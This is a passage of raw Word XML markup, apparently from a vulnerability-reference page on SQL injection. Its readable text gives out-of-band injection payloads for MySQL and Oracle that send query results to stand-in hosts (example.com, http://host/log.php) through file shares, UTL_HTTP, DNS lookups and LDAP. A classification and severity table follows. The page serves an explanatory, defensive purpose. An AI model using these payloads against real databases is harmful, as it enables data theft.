          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>YOUR-INJECTION-HERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>), 'example.com\\')))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E93E3D" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>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Writes data to your shared folder or file:</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?vulnerableParam=-99 OR (SELECT (</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>YOUR-INJECTION-HERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) INTO OUTFILE '\\\\example.com\\share\\output.txt')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000574A5" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Out-of-band injections for Oracle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C58802E" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>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Sending results to your logger application:</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?vulnerableParam=(SELECT UTL_HTTP.REQUEST('http://host/log.php?response='||(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>YOUR-INJECTION-HERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)||'') FROM DUAL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3A654B" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>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Saving results in your HTTP access logs:</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?vulnerableParam=(SELECT UTL_HTTP.REQUEST('http://host/ '||(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>YOUR-INJECTION-HERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)||'.html') FROM DUAL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4CA3F8" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Two ways of sending results in DNS resolution requests (that you can log) to </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>yourhost.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</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?vulnerableParam=(SELECT UTL_INADDR.get_host_addr((</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>YOUR-INJECTION-HERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)||'.example.com') FROM DUAL)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>?vulnerableParam=(SELECT SYS.DBMS_LDAP.INIT((</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>YOUR-INJECTION-HERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)||'.example.com',80) FROM DUAL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103B4401" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL injection vulnerability classifications and severities</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="14400" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7560"/>
        <w:gridCol w:w="6840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="436F02CE" w14:textId="77777777" w:rsidTr="00BF4E6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7F7F7"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CAC84D9" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF4E67">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1171524D" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF4E67">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ID / Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="2077CC47" w14:textId="77777777" w:rsidTr="00BF4E67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14CB6078"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PCI DSS 3.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5940A7F2"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6.5.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="2B70A8E7" w14:textId="77777777" w:rsidTr="00BF4E67">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2EE47FB5"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PCI DSS 4.0</w:t>
            </w:r>
          </w:p>
        </w:tc>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0F041A46"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6.2.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="5BB6BA5A" w14:textId="77777777" w:rsidTr="00BF4E67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C0C659C"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OWASP 2013</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22A2D449"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A1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="67337D42" w14:textId="77777777" w:rsidTr="00BF4E67">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0C17F3A1"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OWASP 2017</w:t>
            </w:r>
          </w:p>
        </w:tc>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0DEA0E4E"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A1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="4F7F85FD" w14:textId="77777777" w:rsidTr="00BF4E67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D592C49"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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2104C829"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89</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="399D74AA" w14:textId="77777777" w:rsidTr="00BF4E67">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6A44247B"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lastRenderedPageBreak/>
              <w:t>CAPEC</w:t>
            </w:r>
          </w:p>
        </w:tc>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53388043"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66</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="7C030D1B" w14:textId="77777777" w:rsidTr="00BF4E67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68916DEE"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WASC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E332AF0"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19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="27553297" w14:textId="77777777" w:rsidTr="00BF4E67">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1C1AAF6F"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HIPAA</w:t>
            </w:r>
          </w:p>
        </w:tc>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46C8FB15"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164.306(a), 164.308(a)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="49721F19" w14:textId="77777777" w:rsidTr="00BF4E67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A829C28"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ISO27001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FAD6114"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A.14.2.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="6EB35A75" w14:textId="77777777" w:rsidTr="00BF4E67">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3A1FCBF6"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ASVS 4.0</w:t>
            </w:r>
          </w:p>
        </w:tc>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70E079F3"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5.3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="3BB1135D" w14:textId="77777777" w:rsidTr="00BF4E67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71A22C04"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NIST SP 800-53</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="757F9CD8"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SI-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="19979260" w14:textId="77777777" w:rsidTr="00BF4E67">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1340AB3B"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DISA STIG</w:t>
            </w:r>
          </w:p>
        </w:tc>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32F5C51C"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V-16807</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="01F227DF" w14:textId="77777777" w:rsidTr="00BF4E67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66D72020"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OWASP API 2019</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65F84EC1"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API8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="0C404E9D" w14:textId="77777777" w:rsidTr="00BF4E67">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41F03CC0"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OWASP Top 10 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>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38576812"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A03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="20D39075" w14:textId="77777777" w:rsidTr="00BF4E67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A1488DF"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CVSS 3.0 Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="270D2F29" w14:textId="77777777" w:rsidTr="00BF4E67">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6F5989E1"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Base</w:t>
            </w:r>
          </w:p>
        </w:tc>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590B717A"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10 (Critical)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w14:paraId="31122F67" w14:textId="77777777" w:rsidTr="00BF4E67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FD70991"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Temporal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
